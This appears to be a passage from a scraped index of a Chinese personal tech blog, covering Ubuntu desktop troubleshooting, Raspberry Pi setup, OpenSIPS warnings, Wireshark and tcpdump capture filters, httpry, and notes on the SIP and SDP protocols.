选择linux的原因无非是丰富的开发软件包,各种个样的效率工具,而不是因为漂亮的GUI。\n我使用ubuntu大概已经有有几个月了,说说一些使用体会。\n聊天软件: 微信、QQ等工,目前只有wine版,使用体验会稍微比mac和window有些差,但是基本是可用。 输入法:搜狗输入法,基本上和win和mac没有什么差别 文档: wps 基本上和win和mac没有区别 浏览器: chrome, firefox体验始终丝滑 编辑器:neovim 畅享丝滑 各种开发工具:git, docker, oh my zsh tmux 等等, 这些天然就是linux下面的工具 总体来说,如果没有最近遇到的两个严重问题,我会一直用ubuntu下开发的。\nxorg经常cpu很高,导致界面卡死,出现频率很高,查了很多资料,依然无法解决。只能通过restart gdm3去重启。 有时候xorg cpu不算高,也查不出高cpu的进程,但是整个界面还是卡死 卡死的这个问题真的非常影响开发效率。\n所以我决定关闭ubuntu的图形界面,通过ssh链远程接,在上面做开发\n10. ubuntu 终端还是图形界面 ubuntu boot最后阶段,进入到登录提示。\n这里有两个选择\n图形界面 tty终端 具体是进入哪种显示方式,是由配置决定。但是默认的是图形界面。\n# 终端启动 systemctl set-default multi-user.target # 图形界面启动 systemctl set-default graphical.target 设置之后reboot 11. 如何从GUI进入到终端模式呢? 某些时候,ubuntu图形界面卡死,无法交互。如何进入终端模式使用top命令看看什么在占用CPU呢?\n有以下快捷键可以从GUI切换到tty\nCtrl + alt + f1 Ctrl + alt + f2 Ctrl + alt + f3 Ctrl + alt + f4 Ctrl + alt + f5 Ctrl + alt + f6 上面的快捷键都可以进入终端,如果一个不行,就用另一个试试。注意 ctrl alt f功能键 要同时按下去。\n我之前就遇到过,图形界面卡死,无法操作。然后进入终端模式,使用top命令,看到xorg占用了接近100%的CPU.\n然后输入下面的命令来重启gdm来解决的\nsudo systemctl restart gdm 12. 什么是GDM? GDM是gnome display manager的缩写。\n# 查看gonme版本号 gnome-shell --version 常见的gdm有\ngdm3 lightdm ssdm 通过查看/etc/X11/default-display-manager可以查看系统使用的gdm具体是哪个\n➜ ~ cat /etc/X11/default-display-manager /usr/sbin/gdm3 也可以通过下面的方式查看 systemctl status display-manager # 可以通过下面的方式安装不同的gdm sudo apt install lightdm sudo apt install sddm # 通过dpkg-reconfigure 可以来配置使用不同的GDM sudo dpkg-reconfigure gdm3 sudo dpkg-reconfigure lightdm sudo dpkg-reconfigure sddm 13. ubuntu截图软件flameshot apt install flameshot 14. 生命不息 折腾不止 使用ubuntu作为主力开发工具 最初,我花了6年时间在windows上学习、娱乐、编码\n后来我花了4年时间转切换到macbook pro上开发\n现在,我切换到ubuntu上开发。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华\n才学会什么是效率,什么是专一。\n蓦然回首\n这10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n内心深处彷佛有人在说,你为什么要改变呢? 之前的感觉不是很好吗?\n你为什么要这么折腾呢?\n有一种鸟儿注定不会被关在牢笼里,因为它的每一片羽毛都闪耀着自由的光辉。\u0026ndash;《肖申克的救赎》\n改变,的确是让人不舒服的事情。\n说实话,刚开始在ubuntu上开发,连装个中文输入法都让我绝望的想要放弃。\n还好是IT行业,你路过的坑,肯定有前任踩过。\n说来有点搞笑,我在ubuntu上使用vscode时,居然感觉不习惯了。\n我不习惯写着写着代码,还要把手从键盘上移开,去寻找千里之行的鼠标,然后滑动、点击、一直不停歇\n然后我就切换回neovim。\n有人说:vim是跟得上思维速度的编辑器。只有真正使用过的人,才能理解这句话。\n当你每次想向上飞的时候,总会有更大的阻力。\n15. 最后的最后 我用的deepin 如果我只用终端,连上linux做开发,那么我最好的选择是ubuntu或者manjaro 但是我还是避免不了要用微信,腾讯会议等App,我又想用linux, 那最好的选择是deepin 可能是人老了,不想再折腾了\n","permalink":"https://wdd.js.org/posts/2022/10/ubuntu-tips/","summary":"1. ubuntu wine 微信中文乱码 修改文件 /opt/deepinwine/tools/run.sh /opt/deepinwine/tools/run_v2.sh 将WINE_CMD那行中加入LC_ALL=zh_CN.UTF-8\nWINE_CMD=\u0026#34;LC_ALL=zh_CN.UTF-8 deepin-wine\u0026#34; 参考 https://gitee.com/wszqkzqk/deepin-wine-for-ubuntu\n2. ubuntu 20.04 wine 微信 qq 截图时黑屏 之前截图都是好的的,不知道为什么,今天截图时,点击了微信的截图按钮后,屏幕除了状态栏,都变成黑色的了。\n各种搜索引擎搜了一遍,没有发现解决方案。\n最后决定思考最近对系统做了什么变更,最近我好像给系统安装了新的主题,然后在登录时,选择了新的主题,而没有选择默认的ubuntu主题。\n在登录界面的右下角,有个按钮,点击之后,可以选择主题。\n最近我都是选择其他的主题,没有选择默认的ubuntu主题,然后我就注销之后,重新在登录时选择默认的ubuntu主题后,再次打开微信截图,功能恢复正常。\n所以说,既然选择ubuntu了,就没必要搞些花里胡哨的东西。ubuntu默认的主题挺好看的,而且支持自带主题的设置,就没必要再折腾了。\n3. [open] ubuntu 20.04 锁屏后 解锁屏幕非常慢 super + l可以用来锁屏,锁屏之后屏幕变成黑屏。\n黑屏之后,如果需要唤醒屏幕,可以随便在键盘上按键,去唤醒屏幕。但是这个唤醒的过程感觉很慢,基本上要随便按键接近十几秒,屏幕才能被点亮,网上搜了下,但是没有找到原因。\n但是有个解决办法,就是在黑屏状态下,不要随便输入,而要输入正确的密码,然后按回车键, 这样会快很多。\n也就是说,系统运行正常,可能是显示器的问题。\n4. ubuntu 20.04 xorg 高cpu 桌面卡死 sudo systemctl restart gdm 5. ubuntu 状态栏显示网速 sudo add-apt-repository ppa:fossfreedom/indicator-sysmonitor sudo apt-get install indicator-sysmonitor 在任务启动中选择System Monitor\n在配置中可以选择开机启动\n在高级中可以设置显示哪些列, 我只关系网速,所以只写了{net}\n6. 在命令行查看图片 实际上终端并不能显示图片,而是调用了外部的程序取显示图片。\neog 是 Eye Of Gnome 的缩写, 它其实是个图片查看器。","title":"Ubuntu 使用过程中遇到的问题以及解决方案"},{"content":"我已经装过几次树莓派的系统了,记录一些使用心得。\n1. 选择哪个版本 最好用无桌面版,无桌面版更加稳定。我之前用过几次桌面版,桌面版存在以下问题。\n使用偶尔感觉会卡 经常使用一天之后,第二天要重启系统。 2. 关于初始设置 默认的用户是 pi,默认的密码是raspberry 登录成功之后,sudo passwd pi 来修改pi用户的密码 登录之后,sudo passwd root 来设置root的用户密码 3. 开启ssh 远程登录服务 raspi-config 4. root用户ssh登录 默认树莓派是禁止使用root远程登录的,想要开启的话,需要编辑/etc/ssh/sshd_config文件,增加一行PermitRootLogin yes, 然后重启ssh服务\nvi /etc/ssh/sshd_config PermitRootLogin yes sudo systemctl restart ssh // chong 5. 关于联网 联网有两个方案\n用网线连接,简单方便,但是有条线子,总会把桌面搞得很乱 使用wifi连接,简单方便 使用wifi连接,一种方式是编辑配置文件,这个比较麻烦。我建议使用树莓派提供的raspi-config命令来设置wifi。\n在命令行中输入:raspi-config, 可以看到如下界面\n按下箭头,选择NetWork Options,按回车确认 进入网络设置后,按下箭头,选择N2 Wi-fi 然后就很简单了,输入wifi名称和wifi密码,最好你的wifi名称是英文的,出现中文会很尴尬的。 6. 如何找到树莓派的IP地址 某些情况下,树莓派在断电重启之后会获得新的IP地址。在没有显示器的情况下,如果找到树莓派的IP呢?\n树莓派的MAC地址是:b8:27:eb:6c 开头\n所以你只需要输入: arp -a 就会打印网络中的主机以及MAC地址,找以b8:e7:eb:6c开头的,很可能就是树莓派。\n7. 设置清华镜像源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/\n","permalink":"https://wdd.js.org/posts/2022/10/raspi-config/","summary":"我已经装过几次树莓派的系统了,记录一些使用心得。\n1. 选择哪个版本 最好用无桌面版,无桌面版更加稳定。我之前用过几次桌面版,桌面版存在以下问题。\n使用偶尔感觉会卡 经常使用一天之后,第二天要重启系统。 2. 关于初始设置 默认的用户是 pi,默认的密码是raspberry 登录成功之后,sudo passwd pi 来修改pi用户的密码 登录之后,sudo passwd root 来设置root的用户密码 3. 开启ssh 远程登录服务 raspi-config 4. root用户ssh登录 默认树莓派是禁止使用root远程登录的,想要开启的话,需要编辑/etc/ssh/sshd_config文件,增加一行PermitRootLogin yes, 然后重启ssh服务\nvi /etc/ssh/sshd_config PermitRootLogin yes sudo systemctl restart ssh // chong 5. 关于联网 联网有两个方案\n用网线连接,简单方便,但是有条线子,总会把桌面搞得很乱 使用wifi连接,简单方便 使用wifi连接,一种方式是编辑配置文件,这个比较麻烦。我建议使用树莓派提供的raspi-config命令来设置wifi。\n在命令行中输入:raspi-config, 可以看到如下界面\n按下箭头,选择NetWork Options,按回车确认 进入网络设置后,按下箭头,选择N2 Wi-fi 然后就很简单了,输入wifi名称和wifi密码,最好你的wifi名称是英文的,出现中文会很尴尬的。 6. 如何找到树莓派的IP地址 某些情况下,树莓派在断电重启之后会获得新的IP地址。在没有显示器的情况下,如果找到树莓派的IP呢?\n树莓派的MAC地址是:b8:27:eb:6c 开头\n所以你只需要输入: arp -a 就会打印网络中的主机以及MAC地址,找以b8:e7:eb:6c开头的,很可能就是树莓派。\n7. 设置清华镜像源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/","title":"树莓派初始化配置"},{"content":" 可能和avp_db_query有关 https://opensips.org/pipermail/users/2018-October/040157.html What we found is that the warning go away if we comment out the single avp_db_query that is being used in our config.\n_ The avp_db_query is not executed at the start, but only when specific header is present. Yet the fooding start immediately after opensips start. The mere presence of the avp_db_query function in config without execution is enough to have the issue._\n可能和openssl库有关 https://github.com/OpenSIPS/opensips/issues/1771#issuecomment-517744489 ere are your results. I\u0026rsquo;m attaching the full backtrace (looks about the same) and the logs containing the memory debug. Please let me know if you need additional info.\n这个讨论很有价值 感觉和curl超时有关 https://github.com/OpenSIPS/opensips/issues/929 I checked with a tcpdump, and that http request was answered after 40ms, but opensips missed it. Another strange thing is that despite of the use of async, opensips does not process any other SIP request while waiting for this missing answer, I see because with default params, with 20s timeout, opensips didn\u0026rsquo;t process REGISTER request and SIP endpoints unregistered, this is the reason because I changed connection timeout to 1s.\nI\u0026rsquo;ve discovered that this issue occured only if http keepalive (tcp persistent connection) is enabled. I\u0026rsquo;ve simply added \u0026ldquo;KeepAlive Off\u0026rdquo; directive in httpd configuration and the problem stopped.\nI hope this info will be useful for debugging.\n使用opensipsctl trap 可以产生调用栈文件 WARNING:core:utimer_ticker: utimer task already scheduled for 8723371990 ms (now 8723387850 ms), it may overlap.\n参考资料 https://github.com/OpenSIPS/opensips/issues/1767 https://opensips.org/pipermail/users/2018-October/040151.html https://github.com/OpenSIPS/opensips/issues/2183 https://github.com/OpenSIPS/opensips/issues/1858 https://opensips.org/pipermail/users/2019-August/041454.html https://opensips.org/pipermail/users/2017-October/038209.html ","permalink":"https://wdd.js.org/opensips/ch1/utime-task-scheduled/","summary":"可能和avp_db_query有关 https://opensips.org/pipermail/users/2018-October/040157.html What we found is that the warning go away if we comment out the single avp_db_query that is being used in our config.\n_ The avp_db_query is not executed at the start, but only when specific header is present. Yet the fooding start immediately after opensips start. The mere presence of the avp_db_query function in config without execution is enough to have the issue._\n可能和openssl库有关 https://github.com/OpenSIPS/opensips/issues/1771#issuecomment-517744489 ere are your results.","title":"utimer task \u003ctm-utimer\u003e already scheduled"},{"content":"1. HTTP抓包例子 案例:本地向 http://192.168.40.134:31204/some-api,如何过滤?\nhttp and ip.addr == 192.168.40.134 and tcp.port == 31204 语句分析:\nhttp 表示我只需要http的包 ip.addr 表示只要源ip或者目标ip地址中包含192.168.40.134 tcp.port 表示只要源端口或者目标端口中包含31204 2. 为什么我写的表达式总是不对呢?😂 很多时候,你写的表达式背景色变成红色,说明表达式错误了,例如下图:http and ip.port == 31204\n写出ip.port这个语句,往往是对传输协议理解不清晰。😅\nip是网络层的协议,port是传输层tcp或者udp中使用的。例如你写tcp.port == 80,udp.port ==3000这样是没问题的。但是port不能跟在ip的后面,如果你不清楚怎么写,你可以选择wireshark的智能提示。\n智能提示会提示所有可用的表达式。\n3. 常用过滤表达式 一般我们的过滤都是基于协议,ip地址或者端口号进行过滤的,\n3.1. 基于协议的过滤 直接输入协议名进行过滤\n3.2. 基于IP地址的过滤 3.3. 基于端口的过滤 基于端口的过滤一般就两种\ntcp.port == xxx udp.port == xxx 3.4. 基于host的过滤 4. 比较运算符支持 == 等于 != 不等于 \u0026gt; 大于 \u0026lt; 小于 \u0026gt;= 大于等于 \u0026lt;= 小于等于 ip.addr == 192.168.2.4 5. 逻辑运算符 and 条件与 or 条件或 xor 仅能有一个条件为真 not 所有条件都不能为真 ip.addr == 192.168.2.4 and tcp.port == 2145 and !tcp.port == 3389 6. 只关心某些特殊的tcp包 tcp.flags.fin==1 只过滤关闭连接的包 tcp.flags.syn==1\t只过滤建立连接的包 tcp.flags.reset==1 只过滤出tcp连接重置的包 7. 统计模块 7.1. 查看有哪些IP Statistics -\u0026gt; endpoints\n7.2. 查看那些IP之间发生会话 Statistics -\u0026gt; Conversations\n7.3. 按照协议划分 8. 最后 在会使用上述四个过滤方式之后,就可以自由的扩展了\n🏄🏄🏄🏄🏄🏄 ⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️ 🏋️🏋️🏋️🏋️🏋️🏋️\nhttp.request.method == GET # 基于http请求方式的过滤 ip.src == 192.168.1.4 ","permalink":"https://wdd.js.org/network/wireshark/","summary":"1. HTTP抓包例子 案例:本地向 http://192.168.40.134:31204/some-api,如何过滤?\nhttp and ip.addr == 192.168.40.134 and tcp.port == 31204 语句分析:\nhttp 表示我只需要http的包 ip.addr 表示只要源ip或者目标ip地址中包含192.168.40.134 tcp.port 表示只要源端口或者目标端口中包含31204 2. 为什么我写的表达式总是不对呢?😂 很多时候,你写的表达式背景色变成红色,说明表达式错误了,例如下图:http and ip.port == 31204\n写出ip.port这个语句,往往是对传输协议理解不清晰。😅\nip是网络层的协议,port是传输层tcp或者udp中使用的。例如你写tcp.port == 80,udp.port ==3000这样是没问题的。但是port不能跟在ip的后面,如果你不清楚怎么写,你可以选择wireshark的智能提示。\n智能提示会提示所有可用的表达式。\n3. 常用过滤表达式 一般我们的过滤都是基于协议,ip地址或者端口号进行过滤的,\n3.1. 基于协议的过滤 直接输入协议名进行过滤\n3.2. 基于IP地址的过滤 3.3. 基于端口的过滤 基于端口的过滤一般就两种\ntcp.port == xxx udp.port == xxx 3.4. 基于host的过滤 4. 比较运算符支持 == 等于 != 不等于 \u0026gt; 大于 \u0026lt; 小于 \u0026gt;= 大于等于 \u0026lt;= 小于等于 ip.addr == 192.168.2.4 5. 逻辑运算符 and 条件与 or 条件或 xor 仅能有一个条件为真 not 所有条件都不能为真 ip.","title":"Wireshark抓包教程"},{"content":"查看帮助文档 从帮助文档可以看出,包过滤的表达式一定要放在最后一个参数\ntcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ] [ -c count ] [ --count ] [ -C file_size ] [ -E spi@ipaddr algo:secret,... ] [ -F file ] [ -G rotate_seconds ] [ -i interface ] [ --immediate-mode ] [ -j tstamp_type ] [ -m module ] [ -M secret ] [ --number ] [ --print ] [ -Q in|out|inout ] [ -r file ] [ -s snaplen ] [ -T type ] [ --version ] [ -V file ] [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ --time-stamp-precision=tstamp_precision ] [ --micro ] [ --nano ] [ expression ] 列出所有网卡 tcpdump -D 1.enp89s0 [Up, Running, Connected] 2.docker0 [Up, Running, Connected] 3.vetha051ecc [Up, Running, Connected] 4.vethe67e03a [Up, Running, Connected] 5.vethc58c174 [Up, Running, Connected] 指定网卡 -i tcpdump -i eth0 所有网卡 tcpdump -i any 不要域名解析 tcpdump -n -i any 指定主机 tcpdoump host 192.168.0.1 指定源IP或者目标IP # 根据源IP过滤 tcpdump src 192.168.3.2 # 根据目标IP过滤 tcpdump dst 192.168.3.2 指定协议过滤 tcpdump tcp 指定端口 # 根据某个端口过滤 tcpdomp port 33 # 根据源端口或者目标端口过滤 tcpdump dst port 33 tcpdump src port 33 # 根据端口范围过滤 tcpdump portrange 30-90 根据IP和地址 tcpdump -i ens33 tcp and host 192.168.40.30 抓包结果写文件 tcpdump -i ens33 tcp and host 192.168.40.30 -w log.pcap 每隔30秒写一个文件 -G 30 表示每隔30秒写一个文件 文件名中的%实际上是时间格式 tcpdump -i ens33 -G 30 tcp and host 192.168.40.30 -w %Y_%m%d_%H%M_%S.log.pcap 每达到30MB产生一个文件 -C 30 每达到30MB产生一个文件 tcpdump -i ens33 -C 30 tcp and host 192.168.40.30 -w log.pcap 指定抓包的个数 在流量很大的网络上抓包,如果写文件的话,很可能将磁盘写满。所以最好指定一个最大的抓包个数,在达到包的个数后,自动退出。\ntcpdump -c 100000 -i eth0 host 21.23.3.2 -w test.pcap 抓包文件太大,切割成小包 把原来的包文件切割成20M大小的多个包\ntcpdump -r old_file -w new_files -C 20 按照包长大小过滤 # 包长小于某个值 tcpdump less 30 # 包长大于某个值 tcpdump greater 30 按照16进制的方式显示包的内容 BPF 过滤规则 port 53 src port 53 dest port 53 host 1.2.3.4 src host 1.2.3.4 dest host 1.2.3.4 host 1.2.3.4 and port 53 读取old.pcap文件 然后根据条件过滤 产生新的文件 适用于从一个大的pcap文件中过滤出需要的包\ntcpdump -r old.pcap -w new.pcap less 1280 最佳实践 1. 关注 packets dropped by kernel的值 有时候,抓包停止后,tcpdump打印xxx个包drop by kernel。一旦这个值不为零,就要注意了。某些包并不是在网络中丢包了,而是在tcpdump这个工具给丢弃了。\n60 packets captured 279514 packets received by filter 279368 packets dropped by kernel 默认情况下,tcpdump抓包时会做dns解析,这个dns解析会降低tcpdump的处理速度,造成tcpdump的buffer被填满,然后就被tcpdump丢弃。\n我们可以用两个方法解决这个问题\n-B 指定buffer的大小,默认单位为kb。例如-B 1024 -n -nn 设置tcpdump 不要解析host地址,不要抓换协议和端口号 -n Don\u0026#39;t convert host addresses to names. This can be used to avoid DNS lookups. -nn Don\u0026#39;t convert protocol and port numbers etc. to names either. -B buffer_size --buffer-size=buffer_size Set the operating system capture buffer size to buffer_size, in units of KiB (1024 bytes). 参考 https://serverfault.com/questions/131872/how-to-split-a-pcap-file-into-a-set-of-smaller-ones http://alumni.cs.ucr.edu/~marios/ethereal-tcpdump.pdf ethereal-tcpdump.pdf https://unix.stackexchange.com/questions/144794/why-would-the-kernel-drop-packets ","permalink":"https://wdd.js.org/network/tcpdump/","summary":"查看帮助文档 从帮助文档可以看出,包过滤的表达式一定要放在最后一个参数\ntcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ] [ -c count ] [ --count ] [ -C file_size ] [ -E spi@ipaddr algo:secret,... ] [ -F file ] [ -G rotate_seconds ] [ -i interface ] [ --immediate-mode ] [ -j tstamp_type ] [ -m module ] [ -M secret ] [ --number ] [ --print ] [ -Q in|out|inout ] [ -r file ] [ -s snaplen ] [ -T type ] [ --version ] [ -V file ] [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ --time-stamp-precision=tstamp_precision ] [ --micro ] [ --nano ] [ expression ] 列出所有网卡 tcpdump -D 1.","title":"Tcpdump抓包教程"},{"content":"git clone https://gitee.com/nuannuande/httpry.git cd httpry yum install libpcap-devel -y make make install cp -f httpry /usr/sbin/ httpry -i eth0 ","permalink":"https://wdd.js.org/network/httpry/","summary":"git clone https://gitee.com/nuannuande/httpry.git cd httpry yum install libpcap-devel -y make make install cp -f httpry /usr/sbin/ httpry -i eth0 ","title":"http抓包工具httpry使用"},{"content":"1. 什么是SDP? SDP是Session Description Protocol的缩写,翻译过来就是会话描述协议,这个协议通常存储各种和媒体相关的信息,例如支持哪些媒体编码, 媒体端口是多少?媒体IP地址是多少之类的。\nSDP一般作为SIP消息的body部分。如下所示\nINVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74bf9 Max-Forwards: 70 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 v=0 o=alice 2890844526 2890844526 IN IP4 client.atlanta.example.com s=- c=IN IP4 192.0.2.101 t=0 0 m=audio 49172 RTP/AVP 0 a=rtpmap:0 PCMU/8000 刚开始我一直认为某些sip消息一定带有sdp,例如invite消息。某些sip请求一定没有携带sdp。\n实际上sip消息和sdp并没有硬性的附属关系。sip是用来传输信令的,sdp是用来描述媒体流信息的。\n如果信令不需要携带媒体流信息,就可以不用携带sdp。\n一般情况下,invite请求都会带有sdp信息,但是某些时候也会没有。例如3PCC(third party call control), 第三方呼叫控制,是指由第三方负责协商媒体信息。\n常见的一个场景\n2. SDP字段介绍 2.1. v= 版本号 当前sdp的版本号是0,所以常见的都是v=0\n2.2. o= 发起者id o=的格式\no=username session-id version network-type address-type address username: 登录的用户名或者主机host session-id: NTP时间戳 version: NTP时间戳 network-type: 一般是IN, 表示internet address-type: 表示地址类型,可以是IP4, IP6 2.3. c= 连接数据 c=的格式\nc=network-type address-type connection-address network-type: 一般是IN, 表示internet address-type: 地址类型 IP4, IP6 connection-address: 连接地址 2.4. m= 媒体信息 格式\nm=media port transport format-list media 媒体类型 audio 语音 video 视频 image 传真 port 端口号 transport 传输协议 format-list 格式 m=audio 49430 RTP/AVP 0 6 8 99 m=application 52341 udp wb 2.5. a= 扩展属性 2.6. 通用扩展 3. SDP中的RTP RTCP 信息 RTP的端口一般是偶数,例如下面的4002。RTCP是RTP端口下面的一个奇数,如4003。 RTP中传递的是媒体信息,RTCP是用于控制媒体信息传递的控制信令,流入丢包的数据。\nm=audio 4002 RTP/AVP 104 3 0 8 96 a=rtcp:4003 IN IP4 192.168.1.5 4. WebRTC中的RTP和RTCP端口 在WebRTC中,RTP和RTCP的端口一般是公用一个。 在INIVTE消息的SDP中会带有:\na=rtcp-mux 如果服务端同意公用一个端口,并且INVITE请求成功,那么在200 OK的SDP中可以看到下面的内容。 可以看到RTP和RTCP公用20512端口。\nm=audio 20512 RTP/SAVPF 0 8 101 a=rtcp:20512 a=rtcp-mux 5. 参考 https://www.ietf.org/rfc/rfc2327.txt ","permalink":"https://wdd.js.org/opensips/ch1/sip-with-sdp/","summary":"1. 什么是SDP? SDP是Session Description Protocol的缩写,翻译过来就是会话描述协议,这个协议通常存储各种和媒体相关的信息,例如支持哪些媒体编码, 媒体端口是多少?媒体IP地址是多少之类的。\nSDP一般作为SIP消息的body部分。如下所示\nINVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74bf9 Max-Forwards: 70 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 v=0 o=alice 2890844526 2890844526 IN IP4 client.atlanta.example.com s=- c=IN IP4 192.0.2.101 t=0 0 m=audio 49172 RTP/AVP 0 a=rtpmap:0 PCMU/8000 刚开始我一直认为某些sip消息一定带有sdp,例如invite消息。某些sip请求一定没有携带sdp。\n实际上sip消息和sdp并没有硬性的附属关系。sip是用来传输信令的,sdp是用来描述媒体流信息的。\n如果信令不需要携带媒体流信息,就可以不用携带sdp。\n一般情况下,invite请求都会带有sdp信息,但是某些时候也会没有。例如3PCC(third party call control), 第三方呼叫控制,是指由第三方负责协商媒体信息。\n常见的一个场景\n2. SDP字段介绍 2.1. v= 版本号 当前sdp的版本号是0,所以常见的都是v=0\n2.2. o= 发起者id o=的格式","title":"SIP和SDP的关系"},{"content":"1. sip协议由request-uri路由,而不是to字段 sip消息再经过ua发送出去时,request-uri可能会被重写,而to字段,一般是不变的\n2. 主叫生成callId和from tag, 响应to tag由另一方生成 totag的作用可以用来区分初始化请求和序列化请求\n3. sip消息有哪些头字段是必须的? Via Max-Forwards (请求消息必须有这个头,响应消息一般没有这个头) 感谢 @genmzy 提示。 From To Call-ID CSeq 4. 被叫在向主叫发消息时,from和to字段为什么没变? from和to字段用来表名sip 请求的方向,而不是sip消息的方向。主叫发起的请求,那么在这个dialog中,所有的sip消息,主叫和被叫字段都不会变。\n5. 为什么所有via头中的branch都以z9hG4bK开头 这个头是rfc3261中规定的,表示她是经过严格规则生成的,可以用来标记事务。\n6. sip有两种url, 是什么?有什么区别 用户uri: AOR address of record, 例如from和to字段中的url 设备uri: 例如 contact头 用户uri用来唯一认证用户,设备uri用来唯一认证设备。 用户uri往往需要查询数据库,而设备uri来自设备自己的网络地址,不需要查询数据库。 一个用户可能有多个设备 7. sip注册实际上绑定用户url和设备ip地址 我并不能直接联系你,我只能用我的手机拨打你的手机。\n8. 呼叫结束了,为什么呼叫的状态信息还需要维持一段时间? 重传的invite消息,可能包含相同的callI和cseq, 为了影响到之后的呼叫,需要耗尽网络中重传的包。\n9. sip 网关是干什么的? 网关的两侧通信协议是不同的,网关负责将协议翻译成彼此可以理解的协议。sip网关也是如此。电话网络的通信协议不仅仅只有sip, 还有其他的各种信令,如七号信令,ISDN, ISUP, CAS等。\n10. sip结构组件 SIP User Agents Presence Agents B2B User Agents SIp Gateways SIP Server 代理服务器 注册服务器 重定向服务器 11. 代理服务器和UA与网关的区别? 代理服务器没有媒体处理能力 代理服务器不解析消息体,只解析消息头 代理服务器并不分发消息 12. 什么是Forking Proxy? Forking Proxy收到一个INVITE请求,却发出去多个INVITE来呼叫多个UA, 适用于多人会议。 13. SIP url有哪些形式? 下图是 sip url 参数列表: 比较重要的有\nlr ob transport 14. ACK请求的要点知识 只有INVITE需要ACK确认 2xx响应的ACK由主叫方产生 3xx, 4xx,5xx,6xx的ACK是逐跳的,并且一般是代理服务器产生 15. 可靠性的机制 重传 T1 T2 sip如果使用tcp, 那么tcp是自带重传的,不需要sip再做重传机制。如果使用udp, udp本身是没有可靠性的保证的。那么这就需要应用层去自己实现可靠性。\n请求在发送出去时,会启动定时器 重传在达到64T1, 呼叫宣布失败 16. ACK 消息 Cseq method会怎样改变? Cseq不变 method变为ACK 主叫方发送ack, 其中ack的CSeq序号和invite保持一致 17. 端到端的ACK和逐跳的ACK有什么区别 对200响应的ACK是端到端的,对非200的ACK是逐跳的 端到端的ACK是一个新的事务,有新的branchId 逐跳的ACK和上一个INVITE请求的branchId一致 当你收到ACK请求时,你要判断这个ACK是应当立即传递到下一跳,还是自己处理 18. 非INVITE请求的重传 消息发送出去时,启动定时器,周期为T1 如果定时器过期,则再启动定时器,周期为2T1, 周期2倍递增,如果周期到达T2, 则以后的重传周期都是T2 如果中间收到了1xx的消息,则计时器立即将周期设置为T2, 并在T2过期时再次重发 19. INVITE请求的重传 请求以2倍之前的周期执行重传 如果收到1xx的响应,则不会再重传 20. 端到端与逐跳的区别 21. cancel消息的特点 cancel是逐跳的 cancel的CSeq和branchId和上一个invite一致 一般的cancel请求处理图 22. Via的特点 请求在传递给下一站时,UA会在在最上面加上自己的Via头。 branch tag来自 from, to, callId, request-url的hash值 大多数sip头的顺序都是不重要的,但是Via的顺序决定了,响应应该送到哪里 如果请求不是来自Via头 23. 24 CSeq CSeq 会持续增长,有可能不会按1递增 同一个事务的CSeq是相同的 ACK的CSeq会和invite一致 ","permalink":"https://wdd.js.org/opensips/ch1/sip-notes/","summary":"1. sip协议由request-uri路由,而不是to字段 sip消息再经过ua发送出去时,request-uri可能会被重写,而to字段,一般是不变的\n2. 主叫生成callId和from tag, 响应to tag由另一方生成 totag的作用可以用来区分初始化请求和序列化请求\n3. sip消息有哪些头字段是必须的? Via Max-Forwards (请求消息必须有这个头,响应消息一般没有这个头) 感谢 @genmzy 提示。 From To Call-ID CSeq 4. 被叫在向主叫发消息时,from和to字段为什么没变? from和to字段用来表名sip 请求的方向,而不是sip消息的方向。主叫发起的请求,那么在这个dialog中,所有的sip消息,主叫和被叫字段都不会变。\n5. 为什么所有via头中的branch都以z9hG4bK开头 这个头是rfc3261中规定的,表示她是经过严格规则生成的,可以用来标记事务。\n6. sip有两种url, 是什么?有什么区别 用户uri: AOR address of record, 例如from和to字段中的url 设备uri: 例如 contact头 用户uri用来唯一认证用户,设备uri用来唯一认证设备。 用户uri往往需要查询数据库,而设备uri来自设备自己的网络地址,不需要查询数据库。 一个用户可能有多个设备 7. sip注册实际上绑定用户url和设备ip地址 我并不能直接联系你,我只能用我的手机拨打你的手机。\n8. 呼叫结束了,为什么呼叫的状态信息还需要维持一段时间? 重传的invite消息,可能包含相同的callI和cseq, 为了影响到之后的呼叫,需要耗尽网络中重传的包。\n9. sip 网关是干什么的? 网关的两侧通信协议是不同的,网关负责将协议翻译成彼此可以理解的协议。sip网关也是如此。电话网络的通信协议不仅仅只有sip, 还有其他的各种信令,如七号信令,ISDN, ISUP, CAS等。\n10. sip结构组件 SIP User Agents Presence Agents B2B User Agents SIp Gateways SIP Server 代理服务器 注册服务器 重定向服务器 11.","title":"SIP协议拾遗补缺"},{"content":"传统中继 sip trunk中继 安全可靠:SIP Trunk设备和ITSP之间只需建立唯一的、安全的、具有QoS保证的SIP Trunk链路。通过该链路来承载企业的多路并发呼叫,运营商只需对该链路进行鉴权,不再对承载于该链路上的每一路SIP呼叫进行鉴权。 节约硬件成本:企业内部通信由企业IP-PBX负责。企业所有外出通信都通过SIP Trunk交由ITSP,再由ITSP中的设备发送到PSTN网络,企业不再需要维护原有的传统PSTN中继链路,节省了硬件和维护成本。 